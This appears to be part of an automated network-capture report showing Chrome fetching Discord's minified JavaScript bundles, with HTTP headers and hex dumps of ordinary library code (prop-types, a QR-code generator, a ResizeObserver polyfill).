                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 63 74 69 6f 6e 28 6e 29 7b 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 5b 6e 5d 3f 76 6f 69 64 20 30 21 3d 3d 76 2e 72 65 67 69 73 74 65 72 65 64 5b 65 5b 6e 5d 5d 3f 74 2b 3d 6e 2b 22 7b 22 2b 76 2e 72 65 67 69 73 74 65 72 65 64 5b 65 5b 6e 5d 5d 2b 22 7d 22 3a 74 2b 3d 63 28 6e 29 2b 22 3a 22 2b 70 28 6e 2c 65 5b 6e 5d 29 2b 22 3b 22 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 5b 6e 5d 29 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 5b 6e 5d 5b 30 5d 26 26 76 6f 69 64 20 30 3d 3d 3d 76 2e 72 65 67 69 73 74 65 72 65 64 5b 65 5b 6e 5d 5b 30 5d 5d 3f 65 5b 6e 5d 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2b 3d 63 28 6e 29 2b 22 3a 22 2b 70 28 6e 2c 65 29 2b 22 3b 22 7d 29 3a 74 2b 3d 6e 2b 22 7b 22 2b 79
                                                                                                                                                                                                                                                                                    Data Ascii: ction(n){"object"!=typeof e[n]?void 0!==v.registered[e[n]]?t+=n+"{"+v.registered[e[n]]+"}":t+=c(n)+":"+p(n,e[n])+";":Array.isArray(e[n])&&"string"==typeof e[n][0]&&void 0===v.registered[e[n][0]]?e[n].forEach(function(e){t+=c(n)+":"+p(n,e)+";"}):t+=n+"{"+y


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    77192.168.2.549796162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC862OUTGET /assets/6e08830110af09d36881.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 17463
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0d9e9f718f6-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "91baf608f20ffc81ef2af8c0e617267b"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 12 Nov 2024 23:59:08 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0gqPw59vRBx08lzsBXKXYhpiPiUS%2B7k3z4Mw%2B6SkiI9EeFxABhWSiAYxbug9DR8hB3vz8VNOKBj829KcBlD1eF92z4WUIWtWbiVk113%2Bo5iSKqeVzXdRri2Gsz2a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC407INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 36 31 37 32 22 5d 2c 7b 38 38 34 38 33 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 72 28 33 31 31 35 39 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 7d 69 2e 72 65 73 65 74 57 61 72 6e 69 6e 67 43 61 63 68 65 3d 6e 2c 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 2c 72 2c 6e 2c 69 2c 61 29 7b 69 66 28 61 21 3d 3d 6f 29 7b 76 61 72 20 75 3d 45 72 72 6f 72 28 22 43 61 6c 6c
                                                                                                                                                                                                                                                                                    Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["26172"],{884835:function(t,e,r){"use strict";var o=r(311596);function n(){}function i(){}i.resetWarningCache=n,t.exports=function(){function t(t,e,r,n,i,a){if(a!==o){var u=Error("Call
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 73 65 2d 63 68 65 63 6b 2d 70 72 6f 70 2d 74 79 70 65 73 22 29 3b 74 68 72 6f 77 20 75 2e 6e 61 6d 65 3d 22 49 6e 76 61 72 69 61 6e 74 20 56 69 6f 6c 61 74 69 6f 6e 22 2c 75 7d 7d 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 20 74 7d 74 2e 69 73 52 65 71 75 69 72 65 64 3d 74 3b 76 61 72 20 72 3d 7b 61 72 72 61 79 3a 74 2c 62 69 67 69 6e 74 3a 74 2c 62 6f 6f 6c 3a 74 2c 66 75 6e 63 3a 74 2c 6e 75 6d 62 65 72 3a 74 2c 6f 62 6a 65 63 74 3a 74 2c 73 74 72 69 6e 67 3a 74 2c 73 79 6d 62 6f 6c 3a 74 2c 61 6e 79 3a 74 2c 61 72 72 61 79 4f 66 3a 65 2c 65 6c 65 6d 65 6e 74 3a 74 2c 65 6c 65 6d 65 6e 74 54 79 70 65 3a 74 2c 69 6e 73 74 61 6e 63 65 4f 66 3a 65 2c 6e 6f 64 65 3a 74 2c 6f 62 6a 65 63 74 4f 66 3a 65 2c 6f 6e 65 4f 66 3a 65 2c 6f 6e 65 4f 66
                                                                                                                                                                                                                                                                                    Data Ascii: se-check-prop-types");throw u.name="Invariant Violation",u}}function e(){return t}t.isRequired=t;var r={array:t,bigint:t,bool:t,func:t,number:t,object:t,string:t,symbol:t,any:t,arrayOf:e,element:t,elementType:t,instanceOf:e,node:t,objectOf:e,oneOf:e,oneOf
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 2d 72 2b 65 29 3b 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 74 2e 6c 65 6e 67 74 68 2d 72 3b 6f 2b 2b 29 74 68 69 73 2e 6e 75 6d 5b 6f 5d 3d 74 5b 6f 2b 72 5d 7d 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 75 6d 5b 74 5d 7d 2c 67 65 74 4c 65 6e 67 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 75 6d 2e 6c 65 6e 67 74 68 7d 2c 6d 75 6c 74 69 70 6c 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 41 72 72 61 79 28 74 68 69 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 2b 74 2e 67 65 74 4c 65 6e 67 74 68 28 29 2d 31 29 2c 72 3d 30 3b 72 3c 74 68 69 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 3b 72 2b 2b 29 66 6f 72 28 76 61 72 20 69
                                                                                                                                                                                                                                                                                    Data Ascii: -r+e);for(var o=0;o<t.length-r;o++)this.num[o]=t[o+r]}n.prototype={get:function(t){return this.num[t]},getLength:function(){return this.num.length},multiply:function(t){for(var e=Array(this.getLength()+t.getLength()-1),r=0;r<this.getLength();r++)for(var i
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 64 65 2c 34 29 2c 72 2e 70 75 74 28 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 2c 61 2e 67 65 74 4c 65 6e 67 74 68 49 6e 42 69 74 73 28 73 2e 6d 6f 64 65 2c 74 29 29 2c 73 2e 77 72 69 74 65 28 72 29 7d 69 66 28 72 2e 67 65 74 4c 65 6e 67 74 68 49 6e 42 69 74 73 28 29 3c 3d 38 2a 6f 29 62 72 65 61 6b 7d 74 68 69 73 2e 74 79 70 65 4e 75 6d 62 65 72 3d 74 7d 74 68 69 73 2e 6d 61 6b 65 49 6d 70 6c 28 21 31 2c 74 68 69 73 2e 67 65 74 42 65 73 74 4d 61 73 6b 50 61 74 74 65 72 6e 28 29 29 7d 2c 6c 2e 6d 61 6b 65 49 6d 70 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3d 34 2a 74 68 69 73 2e 74 79 70 65 4e 75 6d 62 65 72 2b 31 37 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 3d 41 72 72 61 79 28 74 68 69 73 2e 6d 6f 64 75 6c
                                                                                                                                                                                                                                                                                    Data Ascii: de,4),r.put(s.getLength(),a.getLengthInBits(s.mode,t)),s.write(r)}if(r.getLengthInBits()<=8*o)break}this.typeNumber=t}this.makeImpl(!1,this.getBestMaskPattern())},l.makeImpl=function(t,e){this.moduleCount=4*this.typeNumber+17,this.modules=Array(this.modul
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 3d 31 2a 6e 2c 61 3d 30 3b 61 3c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 6e 5d 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 7b 76 61 72 20 75 3d 31 2a 61 3b 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 6e 5d 5b 61 5d 26 26 28 6f 2e 62 65 67 69 6e 46 69 6c 6c 28 30 2c 31 30 30 29 2c 6f 2e 6d 6f 76 65 54 6f 28 75 2c 69 29 2c 6f 2e 6c 69 6e 65 54 6f 28 75 2b 31 2c 69 29 2c 6f 2e 6c 69 6e 65 54 6f 28 75 2b 31 2c 69 2b 31 29 2c 6f 2e 6c 69 6e 65 54 6f 28 75 2c 69 2b 31 29 2c 6f 2e 65 6e 64 46 69 6c 6c 28 29 29 7d 7d 72 65 74 75 72 6e 20 6f 7d 2c 6c 2e 73 65 74 75 70 54 69 6d 69 6e 67 50 61 74 74 65 72 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 38 3b 74 3c 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 2d 38 3b 74 2b 2b 29 7b 69 66 28 6e 75 6c 6c 3d
                                                                                                                                                                                                                                                                                    Data Ascii: =1*n,a=0;a<this.modules[n].length;a++){var u=1*a;this.modules[n][a]&&(o.beginFill(0,100),o.moveTo(u,i),o.lineTo(u+1,i),o.lineTo(u+1,i+1),o.lineTo(u,i+1),o.endFill())}}return o},l.setupTimingPattern=function(){for(var t=8;t<this.moduleCount-8;t++){if(null=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 6f 64 75 6c 65 43 6f 75 6e 74 2d 38 5d 5b 38 5d 3d 21 74 7d 2c 6c 2e 6d 61 70 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 2d 31 2c 6f 3d 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 2d 31 2c 6e 3d 37 2c 69 3d 30 2c 75 3d 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 2d 31 3b 75 3e 30 3b 75 2d 3d 32 29 66 6f 72 28 36 3d 3d 75 26 26 75 2d 2d 3b 3b 29 7b 66 6f 72 28 76 61 72 20 73 3d 30 3b 73 3c 32 3b 73 2b 2b 29 69 66 28 6e 75 6c 6c 3d 3d 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 6f 5d 5b 75 2d 73 5d 29 7b 76 61 72 20 6c 3d 21 31 3b 69 3c 74 2e 6c 65 6e 67 74 68 26 26 28 6c 3d 28 74 5b 69 5d 3e 3e 3e 6e 26 31 29 3d 3d 31 29 2c 61 2e 67 65 74 4d 61 73 6b 28 65 2c 6f 2c 75 2d 73 29 26 26 28 6c 3d 21 6c 29 2c 74 68
                                                                                                                                                                                                                                                                                    Data Ascii: oduleCount-8][8]=!t},l.mapData=function(t,e){for(var r=-1,o=this.moduleCount-1,n=7,i=0,u=this.moduleCount-1;u>0;u-=2)for(6==u&&u--;;){for(var s=0;s<2;s++)if(null==this.modules[o][u-s]){var l=!1;i<t.length&&(l=(t[i]>>>n&1)==1),a.getMask(e,o,u-s)&&(l=!l),th
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 68 3b 67 2b 2b 29 76 2b 3d 65 5b 67 5d 2e 74 6f 74 61 6c 43 6f 75 6e 74 3b 66 6f 72 28 76 61 72 20 6d 3d 41 72 72 61 79 28 76 29 2c 54 3d 30 2c 67 3d 30 3b 67 3c 6f 3b 67 2b 2b 29 66 6f 72 28 76 61 72 20 6c 3d 30 3b 6c 3c 65 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 67 3c 69 5b 6c 5d 2e 6c 65 6e 67 74 68 26 26 28 6d 5b 54 2b 2b 5d 3d 69 5b 6c 5d 5b 67 5d 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 6e 3b 67 2b 2b 29 66 6f 72 28 76 61 72 20 6c 3d 30 3b 6c 3c 65 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 67 3c 73 5b 6c 5d 2e 6c 65 6e 67 74 68 26 26 28 6d 5b 54 2b 2b 5d 3d 73 5b 6c 5d 5b 67 5d 29 3b 72 65 74 75 72 6e 20 6d 7d 2c 74 2e 65 78 70 6f 72 74 73 3d 73 7d 2c 38 36 30 33 37 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72 20 6f 3d 72 28 39 33 33
                                                                                                                                                                                                                                                                                    Data Ascii: h;g++)v+=e[g].totalCount;for(var m=Array(v),T=0,g=0;g<o;g++)for(var l=0;l<e.length;l++)g<i[l].length&&(m[T++]=i[l][g]);for(var g=0;g<n;g++)for(var l=0;l<e.length;l++)g<s[l].length&&(m[T++]=s[l][g]);return m},t.exports=s},860377:function(t,e,r){var o=r(933
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 32 31 5d 2c 5b 39 2c 36 39 2c 34 33 2c 34 2c 37 30 2c 34 34 5d 2c 5b 31 37 2c 35 30 2c 32 32 2c 31 2c 35 31 2c 32 33 5d 2c 5b 32 2c 34 32 2c 31 34 2c 31 39 2c 34 33 2c 31 35 5d 2c 5b 33 2c 31 34 31 2c 31 31 33 2c 34 2c 31 34 32 2c 31 31 34 5d 2c 5b 33 2c 37 30 2c 34 34 2c 31 31 2c 37 31 2c 34 35 5d 2c 5b 31 37 2c 34 37 2c 32 31 2c 34 2c 34 38 2c 32 32 5d 2c 5b 39 2c 33 39 2c 31 33 2c 31 36 2c 34 30 2c 31 34 5d 2c 5b 33 2c 31 33 35 2c 31 30 37 2c 35 2c 31 33 36 2c 31 30 38 5d 2c 5b 33 2c 36 37 2c 34 31 2c 31 33 2c 36 38 2c 34 32 5d 2c 5b 31 35 2c 35 34 2c 32 34 2c 35 2c 35 35 2c 32 35 5d 2c 5b 31 35 2c 34 33 2c 31 35 2c 31 30 2c 34 34 2c 31 36 5d 2c 5b 34 2c 31 34 34 2c 31 31 36 2c 34 2c 31 34 35 2c 31 31 37 5d 2c 5b 31 37 2c 36 38 2c 34 32 5d 2c 5b 31 37
                                                                                                                                                                                                                                                                                    Data Ascii: 21],[9,69,43,4,70,44],[17,50,22,1,51,23],[2,42,14,19,43,15],[3,141,113,4,142,114],[3,70,44,11,71,45],[17,47,21,4,48,22],[9,39,13,16,40,14],[3,135,107,5,136,108],[3,67,41,13,68,42],[15,54,24,5,55,25],[15,43,15,10,44,16],[4,144,116,4,145,117],[17,68,42],[17
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 31 34 2c 35 35 2c 32 35 5d 2c 5b 32 32 2c 34 35 2c 31 35 2c 34 31 2c 34 36 2c 31 36 5d 2c 5b 36 2c 31 35 31 2c 31 32 31 2c 31 34 2c 31 35 32 2c 31 32 32 5d 2c 5b 36 2c 37 35 2c 34 37 2c 33 34 2c 37 36 2c 34 38 5d 2c 5b 34 36 2c 35 34 2c 32 34 2c 31 30 2c 35 35 2c 32 35 5d 2c 5b 32 2c 34 35 2c 31 35 2c 36 34 2c 34 36 2c 31 36 5d 2c 5b 31 37 2c 31 35 32 2c 31 32 32 2c 34 2c 31 35 33 2c 31 32 33 5d 2c 5b 32 39 2c 37 34 2c 34 36 2c 31 34 2c 37 35 2c 34 37 5d 2c 5b 34 39 2c 35 34 2c 32 34 2c 31 30 2c 35 35 2c 32 35 5d 2c 5b 32 34 2c 34 35 2c 31 35 2c 34 36 2c 34 36 2c 31 36 5d 2c 5b 34 2c 31 35 32 2c 31 32 32 2c 31 38 2c 31 35 33 2c 31 32 33 5d 2c 5b 31 33 2c 37 34 2c 34 36 2c 33 32 2c 37 35 2c 34 37 5d 2c 5b 34 38 2c 35 34 2c 32 34 2c 31 34 2c 35 35 2c 32 35
                                                                                                                                                                                                                                                                                    Data Ascii: 14,55,25],[22,45,15,41,46,16],[6,151,121,14,152,122],[6,75,47,34,76,48],[46,54,24,10,55,25],[2,45,15,64,46,16],[17,152,122,4,153,123],[29,74,46,14,75,47],[49,54,24,10,55,25],[24,45,15,46,46,16],[4,152,122,18,153,123],[13,74,46,32,75,47],[48,54,24,14,55,25
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 72 74 73 3d 65 7d 2c 33 33 38 30 39 31 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 78 70 6f 72 74 73 3d 7b 4d 4f 44 45 5f 4e 55 4d 42 45 52 3a 31 2c 4d 4f 44 45 5f 41 4c 50 48 41 5f 4e 55 4d 3a 32 2c 4d 4f 44 45 5f 38 42 49 54 5f 42 59 54 45 3a 34 2c 4d 4f 44 45 5f 4b 41 4e 4a 49 3a 38 7d 7d 2c 37 34 36 32 37 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72 20 6f 3d 72 28 33 33 38 30 39 31 29 2c 6e 3d 72 28 36 36 39 30 31 33 29 2c 69 3d 72 28 34 36 35 37 35 38 29 2c 61 3d 7b 50 41 54 54 45 52 4e 30 30 30 3a 30 2c 50 41 54 54 45 52 4e 30 30 31 3a 31 2c 50 41 54 54 45 52 4e 30 31 30 3a 32 2c 50 41 54 54 45 52 4e 30 31 31 3a 33 2c 50 41 54 54 45 52 4e 31 30 30 3a 34 2c 50 41 54 54 45 52 4e 31 30 31 3a 35 2c 50 41 54 54 45 52 4e 31 31 30 3a
                                                                                                                                                                                                                                                                                    Data Ascii: rts=e},338091:function(t){t.exports={MODE_NUMBER:1,MODE_ALPHA_NUM:2,MODE_8BIT_BYTE:4,MODE_KANJI:8}},746272:function(t,e,r){var o=r(338091),n=r(669013),i=r(465758),a={PATTERN000:0,PATTERN001:1,PATTERN010:2,PATTERN011:3,PATTERN100:4,PATTERN101:5,PATTERN110:


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    78192.168.2.549800162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC862OUTGET /assets/d67c5e680608266a1f63.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC980INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 7728
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0da4b7a8cc5-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "1c6b9d0ad743762986197ae0e81874c1"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 28 Jun 2024 00:43:11 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2B8R1Vw7jO8CNTB26TuvtTZyw%2FX%2F9%2BYb2Jtl8c%2Fjygm8rWhImdfyTtR4LvsdH9Qv3jYRSb%2Fc3zlK8L%2FTlJ8HoAvuQhIGPg5qOlJAutjvUdZh%2FSNo5N%2FGBitA31cB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 35 34 39 32 22 5d 2c 7b 38 34 39 31 34 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 4d 61 70 29 72 65 74 75 72 6e 20 4d 61 70 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 76 61 72 20 6e 3d 2d 31 3b 72 65 74 75 72 6e 20 74 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 74 5b 30 5d 3d 3d 3d 65 26 26 28 6e 3d 72 2c 21 30 29 7d 29 2c 6e 7d
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["75492"],{849146:function(t,e,n){var r=function(){if("undefined"!=typeof Map)return Map;function t(t,e){var n=-1;return t.some(function(t,r){return t[0]===e&&(n=r,!0)}),n}
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 29 29 7d 2c 31 65 33 2f 36 30 29 7d 2c 63 3d 5b 22 74 6f 70 22 2c 22 72 69 67 68 74 22 2c 22 62 6f 74 74 6f 6d 22 2c 22 6c 65 66 74 22 2c 22 77 69 64 74 68 22 2c 22 68 65 69 67 68 74 22 2c 22 73 69 7a 65 22 2c 22 77 65 69 67 68 74 22 5d 2c 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 74 68 69 73 2e 63 6f 6e 6e 65 63 74 65 64 5f 3d 21 31 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 45 76 65 6e 74 73 41 64 64 65 64 5f 3d 21 31 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 4f 62 73 65 72 76 65 72 5f 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5f 3d 5b 5d 2c 74 68 69 73 2e 6f 6e 54 72 61 6e 73 69 74
                                                                                                                                                                                                                                                                                    Data Ascii: ))},1e3/60)},c=["top","right","bottom","left","width","height","size","weight"],a="undefined"!=typeof MutationObserver,h=function(){function t(){this.connected_=!1,this.mutationEventsAdded_=!1,this.mutationsObserver_=null,this.observers_=[],this.onTransit
